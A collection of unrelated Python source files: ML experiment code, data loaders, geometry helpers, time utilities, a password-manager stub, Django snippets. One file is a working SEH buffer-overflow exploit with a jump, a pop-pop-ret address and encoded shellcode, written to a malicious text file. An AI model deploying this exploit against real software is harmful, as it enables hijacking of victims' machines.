num_features = dataset_info['num_features']
num_labels = dataset_info['num_labels']
models = [nig.MultiLayerPerceptron(
input_size=num_features, output_size=num_labels,
hidden_layer_sizes=architecture, activation=activation,
softmax_output=False, sigmoid_output=True, log_output=False,
train_outputs_one_hot=True, loss=self.loss, loss_summary=False,
optimizer=optimizer, optimizer_opts=optimizer_opts)
for architecture in self.architectures]
# eval_metric = nig.HammingLoss(log_predictions=False)
eval_metrics = [
nig.Accuracy(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True),
nig.AreaUnderCurve(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, curve='pr', num_thresholds=100,
macro_average=True, name='auc'),
nig.Precision(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True),
nig.Recall(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True),
nig.F1Score(
log_outputs=False, scaled_outputs=True,
one_hot_train_outputs=True, thresholds=0.5, macro_average=True)]
super(RCV1V2Experiment, self).__init__(
models=models, eval_metrics=eval_metrics,
labeled_batch_size=labeled_batch_size,
unlabeled_batch_size=unlabeled_batch_size,
test_data_proportion=test_data_proportion,
logging_frequency=logging_frequency,
summary_frequency=summary_frequency,
checkpoint_frequency=checkpoint_frequency,
evaluation_frequency=evaluation_frequency,
variable_statistics_frequency=variable_statistics_frequency,
run_meta_data_frequency=run_meta_data_frequency,
working_dir=working_dir,
checkpoint_file_prefix=checkpoint_file_prefix,
restore_sequentially=restore_sequentially,
save_trained=save_trained)
def __str__(self):
return 'rcv1v2'
def experiment_information(self):
return {'architectures': str(self.architectures),
'loss': str(self.loss)}
def load_data(self, test_proportion=None):
train_data = []
test_data = []
for i in self.data_subsets:
train_data_subset, test_data_subset = loaders.mulan.load(
os.path.join(self.working_dir, 'data'),
'rcv1v2_subset_' + str(i+1))
train_data.append(train_data_subset)
test_data.append(test_data_subset)
train_data = (np.concatenate([d[0] for d in train_data], axis=0),
np.concatenate([d[1] for d in train_data], axis=0))
test_data = (np.concatenate([d[0] for d in test_data], axis=0),
np.concatenate([d[1] for d in test_data], axis=0))
if test_proportion is None:
return train_data, test_data
data = (np.concatenate([train_data[0], test_data[0]], axis=0),
np.concatenate([train_data[1], test_data[1]], axis=0))
if isinstance(self.seed, np.random.RandomState):
rng = self.seed
else:
rng = np.random.RandomState(self.seed)
indices = rng.permutation(np.arange(data[0].shape[0]))
num_samples = len(indices)
num_test = int(num_samples * test_proportion)
train_data = tuple(d[indices[:-num_test]] for d in data)
test_data = tuple(d[indices[-num_test:]] for d in data)
return train_data, test_data
if __name__ == '__main__':
seed = 9999
data_subsets = [0, 1, 2, 3, 4]
architectures = [[1], [8],
[16, 8], [32, 16],
[128, 64, 32, 16], [128, 32, 8], [256, 128]]
use_one_hot_encoding = True
activation = nig.leaky_relu(0.01)
labeled_batch_size = 128
unlabeled_batch_size = 128
test_data_proportion = 0.95
max_iter = 5000
abs_loss_chg_tol = 1e-6
rel_loss_chg_tol = 1e-6
loss_chg_iter_below_tol = 5
logging_frequency = 100
summary_frequency = -1
checkpoint_frequency = -1
evaluation_frequency = 100
variable_statistics_frequency = -1
run_meta_data_frequency = -1
working_dir = os.path.join(os.getcwd(), 'working', 'rcv1v2')
checkpoint_file_prefix = 'ckpt'
restore_sequentially = False
save_trained = False
optimizer = lambda: tf.train.AdamOptimizer() # nig.gradient_descent(1e-1, decay_rate=0.99)
gradients_processor = None # lambda g: tf.clip_by_norm(g, 1e-1)
# optimizer = tf.contrib.opt.ScipyOptimizerInterface
# optimizer_opts = {'options': {'maxiter': 10000}}
# def consensus_loss_metric(outputs, consensus):
# with tf.name_scope('consensus_loss_metric'):
# outputs = tf.exp(outputs)
# metric = tf.square(tf.sub(outputs, consensus))
# metric = tf.reduce_sum(metric)
# return metric
consensus_loss_metric = None
consensus_configurations = experiments.get_consensus_configurations(
consensus_loss_weights=[0.0, 1.0],
multiplier=labeled_batch_size / unlabeled_batch_size)
with nig.dummy(): # tf.device('/cpu:0'):
experiment = RCV1V2Experiment(
data_subsets=data_subsets, architectures=architectures,
activation=activation, labeled_batch_size=labeled_batch_size,
unlabeled_batch_size=unlabeled_batch_size,
test_data_proportion=test_data_proportion, max_iter=max_iter,
abs_loss_chg_tol=abs_loss_chg_tol,
rel_loss_chg_tol=rel_loss_chg_tol,
loss_chg_iter_below_tol=loss_chg_iter_below_tol,
logging_frequency=logging_frequency,
summary_frequency=summary_frequency,
checkpoint_frequency=checkpoint_frequency,
evaluation_frequency=evaluation_frequency,
variable_statistics_frequency=variable_statistics_frequency,
run_meta_data_frequency=run_meta_data_frequency,
working_dir=working_dir,
checkpoint_file_prefix=checkpoint_file_prefix,
restore_sequentially=restore_sequentially,
save_trained=save_trained, optimizer=optimizer,
gradients_processor=gradients_processor)
learners = []
for name, configuration in consensus_configurations:
learner = partial(nig.ConsensusLearner, **configuration)
learners.append((name, learner))
learners.append(('CV', nig.CrossValidationLearner))
learners = OrderedDict(learners)
results = experiment.run(learners)
experiments.save_results(
results, filename=os.path.join(working_dir, 'results.pk'),
update=True, use_backup=True, delete_backup=False, yaml_format=False)
# results = experiments.load_results(
# filename=os.path.join(working_dir, 'results.pk'), yaml_format=False)
experiments.plot_results(results)
|
21,567 | 4b1052ec9ff3ff6056449b358ef5f4b53de24324 | #!/usr/bin/env python
import os.path
import re
import sys
import urllib.request
import yaml
def download_file(url, fname_out=None) -> None:
"""
Downloads a file to a location.
"""
import ssl
try:
with urllib.request.urlopen(url) as f:
if not fname_out:
return f.read().decode("utf-8")
else:
fdir = os.path.dirname(fname_out)
if not os.path.exists(fdir):
os.makedirs(fdir)
with open(fname_out, "wb") as outfile:
outfile.write(f.read())
return fname_out
except ssl.SSLError:
print("WHAT!")
sys.exit(1)
def main():
volume_re = re.compile("""<a href="([^"]*)"><b>(Volume .*)</b></a>""")
volumes = {}
base_url = """http://proceedings.mlr.press/"""
for l in download_file("http://proceedings.mlr.press/").split("\n"):
match = volume_re.search(l)
if match:
volumes[match.group(2)] = [base_url + match.group(1) + "/bibliography.bib"]
print(yaml.dump(volumes))
if __name__ == "__main__":
main()
|
21,568 | 60b78c39e81993eba987ce39982e4e70e26f9340 |
nSeh="\x41\xEB\x18\x41" # -> jmp back 4 bytes
Seh="\xC0\x28\x40\x00" # 004028c0 -> pop pop ret
#bads
#\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20
calc=("\xd9\xc5\xbd\xb1\xb0\x27\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x6a\x14\x03\x6a\xa5\x52\xd2\x36\x2d\x10"
"\x1d\xc7\xad\x75\x97\x22\x9c\xb5\xc3\x27\x8e\x05\x87\x6a\x22"
"\xed\xc5\x9e\xb1\x83\xc1\x91\x72\x29\x34\x9f\x83\x02\x04\xbe"
"\x07\x59\x59\x60\x36\x92\xac\x61\x7f\xcf\x5d\x33\x28\x9b\xf0"
"\xa4\x5d\xd1\xc8\x4f\x2d\xf7\x48\xb3\xe5\xf6\x79\x62\x7e\xa1"
"\x59\x84\x53\xd9\xd3\x9e\xb0\xe4\xaa\x15\x02\x92\x2c\xfc\x5b"
"\x5b\x82\xc1\x54\xae\xda\x06\x52\x51\xa9\x7e\xa1\xec\xaa\x44"
"\xd8\x2a\x3e\x5f\x7a\xb8\x98\xbb\x7b\x6d\x7e\x4f\x77\xda\xf4"
"\x17\x9b\xdd\xd9\x23\xa7\x56\xdc\xe3\x2e\x2c\xfb\x27\x6b\xf6"
"\x62\x71\xd1\x59\x9a\x61\xba\x06\x3e\xe9\x56\x52\x33\xb0\x3c"
"\xa5\xc1\xce\x72\xa5\xd9\xd0\x22\xce\xe8\x5b\xad\x89\xf4\x89"
"\x8a\x66\xbf\x90\xba\xee\x66\x41\xff\x72\x99\xbf\xc3\x8a\x1a"
"\x4a\xbb\x68\x02\x3f\xbe\x35\x84\xd3\xb2\x26\x61\xd4\x61\x46"
"\xa0\xb7\xe4\xd4\x28\x38")
payload="A"*4424 + nSeh + Seh + "A"*90 + calc
filename="bruhHacker.txt"
file=open(filename,"w")
file.write(payload)
file.close() |
21,569 | 9588ed805e4e96a84c515a174a6236946e17fe98 | from pathlib import Path
import numpy as np
import pandas as pd
from PIL import Image
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.dataset import Subset
from torch.utils.data.dataloader import default_collate
from torchvision.transforms import Compose
class TrainvalFilesDataset(Dataset):
def __init__(self, path, corrupted_files=None):
self.path = Path(path)
assert self.path.exists(), "Train/Val dataset is not found at '{}'".format(path)
files = self.path.glob("*.png")
self.images = [f.as_posix() for f in files]
# remove corrupted files:
if corrupted_files is not None:
for f in corrupted_files:
self.images.remove(f)
self.n = len(self.images)
self.labels = [None] * self.n
for i, f in enumerate(self.images):
self.labels[i] = int(Path(f).stem.split('_')[1])
self.unique_labels = np.unique(self.labels)
def __len__(self):
return self.n
def __getitem__(self, index):
return self.images[index], self.labels[index]
class FilesFromCsvDataset(Dataset):
def __init__(self, csv_filepath):
self.csv_filepath = Path(csv_filepath)
assert self.csv_filepath.exists(), "CSV filepath '{}' is not found".format(csv_filepath)
df = pd.read_csv(self.csv_filepath)
self.n = len(df)
self.images = df['filepath'].values
self.labels = df['label'].values
def __len__(self):
return self.n
def __getitem__(self, index):
return self.images[index], self.labels[index]
class TestFilesDataset(Dataset):
def __init__(self, path):
path = Path(path)
assert path.exists(), "Test dataset is not found at '{}'".format(path)
files = path.glob("*.png")
self.images = [f for f in files]
if "_" in self.images[0].stem:
self.image_ids = [self.train_filepath_to_image_id(f) for f in self.images]
else:
self.image_ids = [self.test_filepath_to_image_id(f) for f in self.images]
self.n = len(self.images)
def __len__(self):
return self.n
def __getitem__(self, index):
return self.images[index].as_posix(), self.image_ids[index]
@staticmethod
def train_filepath_to_image_id(filepath):
stem = filepath.stem
split = stem.split("_")
return int(split[0])
@staticmethod
def test_filepath_to_image_id(filepath):
stem = filepath.stem
return int(stem)
def read_image(fp):
return Image.open(fp)
class TransformedDataset(Dataset):
def __init__(self, dataset, transforms, target_transforms=None):
assert isinstance(dataset, Dataset)
assert callable(transforms)
if target_transforms is not None:
assert callable(target_transforms)
self.dataset = dataset
self.transforms = transforms
self.target_transforms = target_transforms
def __len__(self):
return len(self.dataset)
def __getitem__(self, index):
img, label = self.dataset[index]
img = self.transforms(img)
if self.target_transforms is not None:
label = self.target_transforms(label)
return img, label
def get_data_loaders(train_dataset_path,
val_dataset_path,
train_data_transform,
val_data_transform,
train_batch_size, val_batch_size,
num_workers,
pin_memory=True,
collate_fn=default_collate):
if isinstance(train_data_transform, (list, tuple)):
train_data_transform = Compose(train_data_transform)
if isinstance(val_data_transform, (list, tuple)):
val_data_transform = Compose(val_data_transform)
train_dataset = TrainvalFilesDataset(train_dataset_path)
val_dataset = TrainvalFilesDataset(val_dataset_path)
train_dataset = TransformedDataset(train_dataset, transforms=read_image,
target_transforms=lambda l: l - 1)
val_dataset = TransformedDataset(val_dataset, transforms=read_image,
target_transforms=lambda l: l - 1)
train_dataset = TransformedDataset(train_dataset, transforms=train_data_transform)
val_dataset = TransformedDataset(val_dataset, transforms=val_data_transform)
train_loader = DataLoader(train_dataset, batch_size=train_batch_size,
shuffle=True,
collate_fn=collate_fn,
num_workers=num_workers, pin_memory=pin_memory)
val_loader = DataLoader(val_dataset, batch_size=val_batch_size, shuffle=True,
collate_fn=collate_fn,
num_workers=num_workers, pin_memory=pin_memory)
return train_loader, val_loader
def get_test_data_loader(dataset_path,
test_data_transform,
batch_size,
num_workers, pin_memory=True):
if isinstance(test_data_transform, (list, tuple)):
test_data_transform.insert(0, read_image)
test_data_transform = Compose(test_data_transform)
test_dataset = TestFilesDataset(dataset_path)
test_dataset = TransformedDataset(test_dataset, transforms=test_data_transform)
test_loader = DataLoader(test_dataset, batch_size=batch_size,
shuffle=False, drop_last=False,
num_workers=num_workers, pin_memory=pin_memory)
return test_loader
def get_train_eval_data_loader(train_loader, indices=None):
assert isinstance(indices, (list, tuple, np.ndarray))
subset = Subset(train_loader.dataset, indices)
train_eval_loader = DataLoader(subset, batch_size=train_loader.batch_size,
shuffle=False, drop_last=False,
num_workers=train_loader.num_workers,
pin_memory=train_loader.pin_memory,
collate_fn=train_loader.collate_fn,
timeout=train_loader.timeout,
worker_init_fn=train_loader.worker_init_fn)
return train_eval_loader |
21,570 | f71601505181f59e5a539b068568790314bee994 | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import math
import shapely.geometry
def get_polygon_corner(polygon):
bottom_z = polygon[0][1]
top_z = polygon[2][1]
left_y = polygon[0][0]
right_y = polygon[1][0]
return [left_y, right_y, bottom_z, top_z]
def create_rectangle(left_y, right_y, bottom_z, top_z):
return [[left_y, bottom_z],
[right_y, bottom_z],
[right_y, top_z],
[left_y, top_z]]
# all polygons are in the yOz plane
def measure_polygons_width_along_yaxis(polygons):
y_intervals = []
for polygon in polygons:
y_coordinates = []
for pt in polygon:
y_coordinates.append(pt[0])
y_coordinates.sort()
y_intervals.append([y_coordinates[0], y_coordinates[-1]])
return y_intervals
def boolean_intersection_polygon_vertical_rectangle(polygon, y_interval, tolerance = 1E-4):
z_coordinates = []
for pt in polygon:
z_coordinates.append(pt[1])
z_coordinates.sort()
vertical_rectangle = create_rectangle(y_interval[0], y_interval[1], z_coordinates[0], z_coordinates[-1])
shapely_vertical_rectangle = shapely.geometry.Polygon(vertical_rectangle)
shapely_polygon = shapely.geometry.Polygon(polygon)
shapely_intersec_polygon = shapely_polygon.intersection(shapely_vertical_rectangle)
intersection = []
for pt in shapely_intersec_polygon.exterior.coords:
intersection.append([pt[0], pt[1]])
# find the maximum rectange inside the intersection polygon
pt_at_left_z = []
pt_at_right_z = []
for pt in intersection:
if abs(pt[0] - y_interval[0]) < tolerance:
pt_at_left_z.append(pt[1])
if (abs(pt[0] - y_interval[1]) < tolerance):
pt_at_right_z.append(pt[1])
rectangle_minimum_z = max(min(pt_at_left_z), min(pt_at_right_z))
rectangle_maximum_z = min(max(pt_at_left_z), max(pt_at_right_z))
maximize_inscribe_rectangle = create_rectangle(y_interval[0], y_interval[1], rectangle_minimum_z, rectangle_maximum_z)
return maximize_inscribe_rectangle
def measure_polygon_area(poly):
shapely_poly = shapely.geometry.Polygon(poly)
return shapely_poly.area
def draw_polygons_wireframe(polygons):
import matplotlib.pyplot as plt
plt.figure()
for id in range(0, len(polygons)):
poly_coord = polygons[id]
coord = poly_coord.copy()
coord.append(coord[0]) # repeat the first point to create a 'closed loop'
xs, ys = zip(*coord) # create lists of x and y values
plt.plot(xs, ys, color="black")
plt.show()
def draw_polygons_with_strengths(polygons, strength, strength_min = 0, strength_max = 2):
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.cm as cmx
jet = cm = plt.get_cmap('jet')
cNorm = colors.Normalize(vmin=strength_min, vmax=strength_max)
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet)
plt.figure()
for id in range(0, len(polygons)):
poly_coord = polygons[id]
coord = poly_coord.copy()
coord.append(coord[0]) # repeat the first point to create a 'closed loop'
xs, ys = zip(*coord) # create lists of x and y values
plt.plot(xs, ys, color="black")
colorVal = scalarMap.to_rgba(strength[id])
plt.fill(xs, ys, color=colorVal)
plt.colorbar(scalarMap, label="Strength", orientation="vertical")
plt.show()
def slice_polygons_vertically_with_intervals(polygons,
polygons_strengths,
slice_y_intervals):
polygons_yaxis_intervals = measure_polygons_width_along_yaxis(polygons)
polygons_intersec_shapes = []
polygons_intersec_strengths = []
for slice_intv in slice_y_intervals:
for id in range(0, len(polygons)):
polygon = polygons[id]
polygon_x_interval = polygons_yaxis_intervals[id]
strength = polygons_strengths[id]
if polygon_x_interval[1] >= slice_intv[1] and slice_intv[0] >= polygon_x_interval[0]:
intersection = boolean_intersection_polygon_vertical_rectangle(polygon, slice_intv)
polygons_intersec_shapes.append(intersection)
polygons_intersec_strengths.append(strength)
return [polygons_intersec_shapes, polygons_intersec_strengths]
def slice_polygons_vertically(polygons,
polygons_strengths,
resolution,
tolerance = 1E-4):
"""
Slice given polygons into thin strips and projected into 2D
"""
# the intervals of polygons projected into X axis
x_intervals = measure_polygons_width_along_yaxis(polygons)
# the x value of intervals (ascend)
x_endpoints = [0]
for intv in x_intervals:
x_endpoints.append(intv[0])
x_endpoints.append(intv[1])
x_endpoints = list(set(x_endpoints))
x_endpoints.sort()
# compute all possible candidate intervals
candidate_intervals = []
for id in range(0, len(x_endpoints) - 1):
interval_left_x = x_endpoints[id]
interval_right_x = x_endpoints[id + 1]
# in some intervals, the polygons may have zero projection area
# we ignore these intervals to accelerate our program
is_interval_valid = False
for intv in x_intervals:
if interval_left_x > intv[1] - tolerance or interval_right_x < intv[0] + tolerance:
is_interval_valid = False
else:
is_interval_valid = True
break
if is_interval_valid == False:
continue
interval_width = interval_right_x - interval_left_x
# if the interval width is smaller than the fabrication tolerance, we ignore this interval
if interval_width < tolerance:
continue
num_segments = math.ceil(interval_width / resolution)
for kd in range(0, num_segments):
segment_left_x = interval_left_x + interval_width / num_segments * kd
segment_right_x = interval_left_x + interval_width / num_segments * (kd + 1)
candidate_intervals.append([segment_left_x, segment_right_x])
[polygons_intersec_shapes, polygons_intersec_strengths] = slice_polygons_vertically_with_intervals(polygons, polygons_strengths, candidate_intervals)
return [polygons_intersec_shapes, polygons_intersec_strengths]
def squarize_rectangle(left_y, right_y, bottom_z, top_z, resolution, tolerance):
height = top_z - bottom_z
number_of_squares = math.floor(height / resolution)
squares = []
for kd in range(0, number_of_squares):
square = create_rectangle(left_y, right_y, bottom_z + kd * resolution, bottom_z + (kd + 1) * resolution)
squares.append(square)
# leftover
if top_z - (bottom_z + number_of_squares * resolution) > tolerance:
square = create_rectangle(left_y, right_y, bottom_z + number_of_squares * resolution, top_z)
squares.append(square)
return squares
def squarize_polygons(polygons,
polygons_strengths,
resolution,
tolerance = 1E-4):
[slice_polygons, slice_polygons_strengths] = slice_polygons_vertically(polygons, polygons_strengths, resolution, tolerance)
squares_shapes = []
squares_strength = []
for id in range(0, len(slice_polygons)):
polygon = slice_polygons[id]
[left_y, right_y, bottom_z, top_z] = get_polygon_corner(polygon)
squares = []
if bottom_z <= 0 and top_z > 0:
squares0 = squarize_rectangle(left_y, right_y, bottom_z, 0, resolution, tolerance)
squares1 = squarize_rectangle(left_y, right_y, 0, top_z, resolution, tolerance)
squares = [*squares0, *squares1]
else:
squares = squarize_rectangle(left_y, right_y, bottom_z, top_z, resolution, tolerance)
for square in squares:
squares_shapes.append(square)
squares_strength.append(slice_polygons_strengths[id])
return [squares_shapes, squares_strength]
|
21,571 | 74e6cdc134677c76f94145c3cd0f39c90cc609b8 | from cryptography.fernet import Fernet
from os import system
def menu():
x = True
choice_list = [1,2,3,4,5]
while x == True:
system('cls')
print('|-------------------------------------|')
print('| P A S S W O R D M A N A G E R |')
print('|-------------------------------------|')
print('| |')
print('| [1] Open List |')
print('| [2] Search List |')
print('| [3] Add Service |')
print('| [4] Update Service |')
print('| [5] Close |')
print('| |')
print('|-------------------------------------|')
try:
choice = int(input('Make your choice: '))
if choice in choice_list:
x = False
return choice
except:
print('Option not available.')
inp = input('Click enter and try again ')
def write_key():
key = Fernet.generate_key()
with open("key.key", "wb") as key_file:
key_file.write(key)
def load_key():
return open("key.key", "rb").read()
def encrypt(filename, key):
f = Fernet(key)
with open(filename, 'rb') as file:
file_data = file.read()
encrypted_data = f.encrypt(file_data)
with open(filename, "wb") as file:
file.write(encrypted_data)
def decrypt(filename, key):
f = Fernet(key)
with open(filename, "rb") as file:
encrypted_data = file.read()
decrypted_data = f.decrypt(encrypted_data)
with open(filename, "wb") as file:
file.write(decrypted_data)
|
21,572 | 735ee364aeec90761ddcffd530189820ac3109e5 | import sys
def find_time(data):
ele_floor = data[0]
stop_floor = data[1]
walk_floor = data[2]
num_floor = data[3]
floor_arr =list(set(data[5]))
floor_arr.sort()
num_ppl = len(floor_arr)
min_sec = 100000
record = {}
for floor_th in floor_arr:
if floor_th in record:
continue
cur_record = {}
ele_time = 0
cur_sec = 0
for i in range(num_ppl):
if floor_arr[i] in cur_record:
continue
if floor_arr[i] < floor_th:
per_sec = (floor_arr[i]-1)*walk_floor
cur_record[floor_arr[i]] = per_sec
if per_sec > cur_sec:
cur_sec = per_sec
else:
if ele_time == 0:
per_sec = (floor_arr[i]-1) * ele_floor
ele_time = per_sec + stop_floor
cur_record[floor_arr[i]] = per_sec
if per_sec > cur_sec:
cur_sec = per_sec
else:
per_sec = ele_time + (floor_arr[i]-floor_arr[i-1])*ele_floor
cur_record[floor_arr[i]] = per_sec
ele_time += (floor_arr[i]-floor_arr[i-1])*ele_floor + stop_floor
if per_sec > cur_sec:
cur_sec = per_sec
if cur_sec < min_sec:
min_sec = cur_sec
record[floor_th] = min_sec
last_cal = (floor_arr[num_ppl-1]-1)*walk_floor
if last_cal < min_sec:
min_sec = last_cal
return min_sec
first_line = 1
cur_case = 0
cur_case_line = 0
all_data = {}
for line in sys.stdin:
if first_line:
first_line = 0
else:
cur_case_line +=1
if cur_case not in all_data:
all_data[cur_case] = [int(line.strip('\n'))]
elif cur_case_line < 6:
all_data[cur_case].append(int(line.strip('\n')))
else:
all_data[cur_case].append(list(map(int,line.strip('\n').split(' '))))
if cur_case_line == 6:
print(find_time(all_data[cur_case]))
cur_case += 1
cur_case_line = 0 |
21,573 | 2090c063a5776b1c2eb828880563d056f541c1d3 | import os
import ycm_core
flags = [
'-x', 'c',
'-std=c11',
'-I', '/usr/include/xcb/',
'-Wall',
'-Wextra',
'-pedantic',
'-DUSE_CLANG_COMPLETER'
]
def DirectoryOfThisScript():
return os.path.dirname(os.path.abspath(__file__))
def FlagsForFile(filename):
return {
'flags': flags,
'do_cache': True
}
|
21,574 | 8854c4b22bfc8b76e92d31e1f089bb4656d280a8 | import time
import pytz
import datetime
DATE_FLAG = "%Y%m%d"
DATE_ONLY = "%Y-%m-%d"
DATETIME_FLAG = "%Y%m%d%H%M"
FULL_DATETIME = "%Y-%m-%d %H:%M:%S"
TIME_FLAG = "%H%M"
TIME_ONLY = "%H:%M:%S"
# get china time zone
def get_timezone():
return pytz.timezone('Asia/Shanghai')
# time string format detect, maybe not correct
def simple_format_detect(time_str):
tmp = time_str.split(" ")
if len(tmp) > 2:
return "unknown"
if len(tmp) == 2:
if len(tmp[0].split("-")) == 3:
date = "%Y-%m-%d"
else:
date = "%Y%m%d"
hour_len = len(tmp[1].split(":"))
if hour_len == 3:
hour = "%H:%M:%S"
elif hour_len == 2:
hour = "%H:%M"
elif hour_len == 1:
if len(tmp[1]) == 6:
hour = "%H%M%S"
elif len(tmp[1]) == 4:
hour = "%H%M"
else:
return "unknown"
return date + " " + hour
else:
date_tmp = time_str.split("-")
if len(date_tmp) > 3:
return "unknown"
if len(date_tmp) == 3:
return "%Y-%m-%d"
if len(date_tmp) == 2:
return "%Y-%m"
time_tmp = time_str.split(":")
if len(time_tmp) == 3:
return "%H:%M:%S"
if len(time_tmp) == 1:
if len(time_str) == 12:
return "%Y%m%d%H%M"
elif len(time_str) == 8:
return "%Y%m%d"
return "unknown"
return "unknown"
# convert time string to timestamp
def str_to_timestamp(time_str, tformat=FULL_DATETIME):
try:
stime = time.strptime(time_str, tformat)
except:
tformat = simple_format_detect(time_str)
if tformat == "unknown":
return 0
try:
stime = time.strptime(time_str, tformat)
except:
return 0
return int(time.mktime(stime))
# convert time string to datetime
def str_to_datetime(time_str, tformat=FULL_DATETIME):
try:
dt = datetime.datetime.strptime(time_str, tformat)
except:
tformat = simple_format_detect(time_str)
if tformat == "unknown":
return None
try:
dt = datetime.datetime.strptime(time_str, tformat)
except:
return None
return dt
# convert time string to time
def str_to_time(time_str, tformat=FULL_DATETIME):
try:
t = time.strptime(time_str, tformat)
except:
tformat = simple_format_detect(time_str)
if tformat == "unknown":
return None
try:
t = time.strptime(time_str, tformat)
except:
return None
return t
# convert timestamp to datetime
def timestamp_to_datetime(timestamp):
dt = datetime.datetime.utcfromtimestamp(timestamp)
dt = dt + datetime.timedelta(hours=8)
return dt
# convert time string format by self defined
def str_convert_by_defined(time_str, to_format, from_format=FULL_DATETIME):
dt = str_to_datetime(time_str, from_format)
if dt is None:
return "frominvalid"
try:
return dt.strftime(to_format)
except:
return "toinvalid"
# convert time string format to date flag format
def str_to_dateflag(time_str, from_format=FULL_DATETIME):
return str_convert_by_defined(time_str, DATE_FLAG, from_format)
# convert time string format to date int format
def str_to_dateint(time_str, from_format=FULL_DATETIME):
return str_convert_by_defined(time_str, DATE_ONLY, from_format)
# convert time string format to date time flag format
def str_to_datetimeflag(time_str, from_format=FULL_DATETIME):
return str_convert_by_defined(time_str, DATETIME_FLAG, from_format)
# convert time string format to full date time format
def str_to_fulldatetime(time_str, from_format=FULL_DATETIME):
return str_convert_by_defined(time_str, FULL_DATETIME, from_format)
# convert time string format to time flag format
def str_to_timeflag(time_str, from_format=FULL_DATETIME):
return str_convert_by_defined(time_str, TIME_FLAG, from_format)
# convert time string format to time only format
def str_to_timeonly(time_str, from_format=FULL_DATETIME):
return str_convert_by_defined(time_str, TIME_ONLY, from_format) |
21,575 | 0ef61a0a74ed2f3e8327c4da56c4fa3ed6ba1253 | import bpy
from .. Node.Actuators.SFX_Actuators_Basic_Inset import SFX_Actuators_Basic_Inset
from .. Node.Actuators.SFX_Actuators_Expanded_Inset import SFX_Actuators_Expanded_Inset
from .. Node.Actuators.SFX_Digtwin_Basic_Inset import SFX_Digtwin_Basic_Inset
from .. Node.Actuators.SFX_Digtwin_Expanded_Inset import SFX_Digtwin_Expanded_Inset
from .. Node.Sensors.Joystick.SFX_Joystick_Inset import SFX_Joystick_Inset
class sfx(bpy.types.PropertyGroup):
''' Defines sfx '''
bl_idname = "SFX"
clocks ={}
sensors ={}
cues ={}
kinematics ={}
helpers ={}
actuators ={}
|
21,576 | 50edcb84c78ed1c14ae6899b07752700e86d5183 | from __future__ import unicode_literals
import six
class ConsumeLater(Exception):
"""
Exception that says that the current message should be re-queued back
onto its channel as it's not ready to be consumed yet (e.g. global order
is being enforced)
"""
pass
class ResponseLater(Exception):
"""
Exception raised inside a Django view when the view has passed
responsibility for the response to another consumer, and so is not
returning a response.
"""
pass
class RequestTimeout(Exception):
"""
Raised when it takes too long to read a request body.
"""
pass
class RequestAborted(Exception):
"""
Raised when the incoming request tells us it's aborted partway through
reading the body.
"""
pass
class DenyConnection(Exception):
"""
Raised during a websocket.connect (or other supported connection) handler
to deny the connection.
"""
pass
class ChannelSocketException(Exception):
"""
Base Exception is intended to run some action ('run' method)
when it is raised at a consumer body
"""
def run(self, message):
raise NotImplementedError
class WebsocketCloseException(ChannelSocketException):
"""
ChannelSocketException based exceptions for close websocket connection with code
"""
def __init__(self, code=None):
if code is not None and not isinstance(code, six.integer_types) \
and code != 1000 and not (3000 <= code <= 4999):
raise ValueError("invalid close code {} (must be 1000 or from [3000, 4999])".format(code))
self._code = code
def run(self, message):
if message.reply_channel.name.split('.')[0] != "websocket":
raise ValueError("You cannot raise CloseWebsocketError from a non-websocket handler.")
message.reply_channel.send({"close": self._code or True})
class SendNotAvailableOnDemultiplexer(Exception):
"""
Raised when trying to send with a WebsocketDemultiplexer. Use the multiplexer instead.
"""
pass
|
21,577 | 0fb815a9c2d91f87014c4b9de31f9fe1e3224673 | # 3. Определить, какие из слов «attribute», «класс», «функция», «type» невозможно записать
# в байтовом типе.
text = b'attribute'
text = 'attribute'.encode('unicode_escape')
print(type(text))
print(text)
print('----------------------------------------------------')
#text = b'класс'
# SyntaxError: bytes can only contain ASCII literal characters.
text = 'класс'.encode('unicode_escape')
print(type(text))
print(text)
print('----------------------------------------------------')
#text = b'функция'
# SyntaxError: bytes can only contain ASCII literal characters.
text = 'функция'.encode('unicode_escape')
print(type(text))
print(text)
print('----------------------------------------------------')
text = b'type'
text = 'type'.encode('unicode_escape')
print(type(text))
print(text) |
21,578 | e600719e3ad7842ed4271f4d53346c68bbf0b0d8 | n = int(input())
Hi = list(map(int,input().split()))
Ai = list(map(int,input().split()))
result =0
count = 0
from queue import PriorityQueue
que = PriorityQueue(maxsize=n)
for i in range(n):
que.put((Ai[i], Hi[i]))
while not que.empty():
ai,hi = que.get()
result += ai*count + hi
count += 1
print(result)
##첫번째 생각했던 코딩인데 왜 안됐는지 생각중
##n = int(input())
##
##Hi = list(map(int,input().split()))
##Ai = list(map(int,input().split()))
##print("Hi",Hi)
##
##expect = Hi[:]
##result = 0
##numbering = [0]*n
##
##for ex_i in range(n):
## expect[ex_i] += (n-1)*Ai[ex_i]-Hi[ex_i]
##print(expect)
##
##
###i는 몇번째 날에 나무 밸건지, 실제 계산을 위한 수
##for i in range(n):
## cut_tree_index=expect.index(max(expect))
## numbering[n-i-1]=cut_tree_index
## expect[cut_tree_index]=0
#### print("cut_tree_index: ",cut_tree_index)
#### print(expect[cut_tree_index])
#### print("expect : ",expect)
#### print("numbering : ",numbering)
##
##print("Hi",Hi)
##print("Ai",Ai)
##
##
##for j in range(n):
##
## result += Hi[numbering[j]] + j*Ai[numbering[j]]
## print(j)
## print(result)
##
|
21,579 | 8e27c43b56dbfca9870568acd563bac6731eb535 | from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.shortcuts import render, redirect, HttpResponseRedirect
from models import Post
from signupModel import SignUpForm
def login_view(request):
if request.user.is_authenticated():
messages.warning(request, 'you allready loged in')
return redirect(main_page_view)
else:
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
if '@' in username:
try:
username = User.objects.get(email=username).username
except:
